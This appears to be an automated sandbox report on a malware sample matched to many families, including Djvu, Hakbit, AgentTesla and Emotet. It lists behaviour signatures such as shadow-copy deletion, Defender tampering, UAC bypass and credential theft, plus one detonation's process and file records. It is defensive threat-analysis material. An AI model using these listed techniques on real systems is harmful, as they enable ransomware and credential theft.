Malware Analysis Report

2025-05-28 17:08

Sample ID 250504-ft3ntsdq2z
Target 250504-fp27haxxd1.bin
SHA256 d91912b4b945e88e881e54573390e6723cfc41916b6546453b59e60f9beee337
Tags
hakbit credential_access defense_evasion discovery execution ransomware spyware stealer smokeloader backdoor persistence trojan djvu azorult rms aspackv2 infostealer lateral_movement privilege_escalation rat upx 305419896 main 26.02.2020 xdsddd victime 25/03 samay cryptone packer 09/04 07/04 insert-coin yt system hacked hack modiloader cobaltstrike njrat revengerat zloader zeppelin xred agenttesla danabot formbook gozi 86920224 app w9z agilenet banker botnet impact keylogger rezer0 rm3 googleaktualizacija googleaktualizacija1 asyncrat babylonrat darkcomet warzonerat 2020nov1 null emotet epoch2 tenakt
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d91912b4b945e88e881e54573390e6723cfc41916b6546453b59e60f9beee337

Threat Level: Known bad

The file 250504-fp27haxxd1.bin was found to be: Known bad.

Malicious Activity Summary

Modiloader family

Modifies WinLogon for persistence

Zloader, Terdot, DELoader, ZeusSphinx

Cobaltstrike family

Zloader family

Warzonerat family

Emotet

AsyncRat

Asyncrat family

Djvu Ransomware

Gozi family

Formbook

Darkcomet family

njRAT/Bladabindi

Gozi

Azorult family

Modifies visibility of hidden/system files in Explorer

UAC bypass

Danabot family

Djvu family

Danabot x86 payload

Agenttesla family

Darkcomet

Smokeloader family

Xred family

RevengeRAT

Emotet family

Hakbit family

Revengerat family

Hakbit

Detects Zeppelin payload

Rms family

Detected Djvu ransomware

Njrat family

ModiLoader Second Stage

Modifies Windows Defender Real-time Protection settings

Babylonrat family

Babylon RAT

SmokeLoader

RMS

Zeppelin family

WarzoneRat, AveMaria

Formbook family

Disables service(s)

Azorult

Danabot

Windows security bypass

AgentTesla

RevengeRat Executable

Emotet payload

Looks for VirtualBox Guest Additions in registry

CryptOne packer

ReZer0 packer

Warzone RAT payload

AgentTesla payload

Async RAT payload

Deletes shadow copies

Grants admin privileges

Formbook payload

Renames multiple (144) files with added filename extension

Remote Service Session Hijacking: RDP Hijacking

Blocks application from running via registry modification

Blocklisted process makes network request

Stops running service(s)

Sets file to hidden

Disables Task Manager via registry modification

Downloads MZ/PE file

Modifies Windows Firewall

Disables RegEdit via registry modification

Looks for VMWare Tools registry key

Drops file in Drivers directory

Server Software Component: Terminal Services DLL

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

Obfuscated with Agile.Net obfuscator

ACProtect 1.3x - 1.4x DLL software

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Checks QEMU agent file

Credentials from Password Stores: Windows Credential Manager

Modifies file permissions

ASPack v2.12-2.42

Uses the VBS compiler for execution

Looks up external IP address via web service

Maps connected drives based on registry

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Adds Run key to start application

Checks for any installed AV software in registry

Command and Scripting Interpreter: PowerShell

Password Policy Discovery

Drops desktop.ini file(s)

Modifies WinLogon

AutoIT Executable

Drops file in System32 directory

Suspicious use of SetThreadContext

Hide Artifacts: Hidden Users

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Permission Groups Discovery: Local Groups

NSIS installer

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Modifies registry class

Views/modifies file attributes

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Runs net.exe

Checks SCSI registry key(s)

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Runs .reg file with regedit

Suspicious use of SetWindowsHookEx

Opens file in notepad (likely ransom note)

Gathers network information

System policy modification

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Runs ping.exe

Interacts with shadow copies

Suspicious behavior: RenamesItself

Suspicious behavior: SetClipboardViewer

Delays execution with timeout.exe

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-05-04 05:12

Signatures

Cobaltstrike family

cobaltstrike

Detects Zeppelin payload

Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modiloader family

modiloader

Njrat family

njrat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Revengerat family

revengerat

Xred family

xred

Zeppelin family

zeppelin

Zloader family

zloader

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

97s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

Signatures

Disables service(s)

defense_evasion execution

Hakbit

ransomware hakbit

Hakbit family

hakbit

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Reads user/profile data of web browsers

spyware stealer

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5868 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
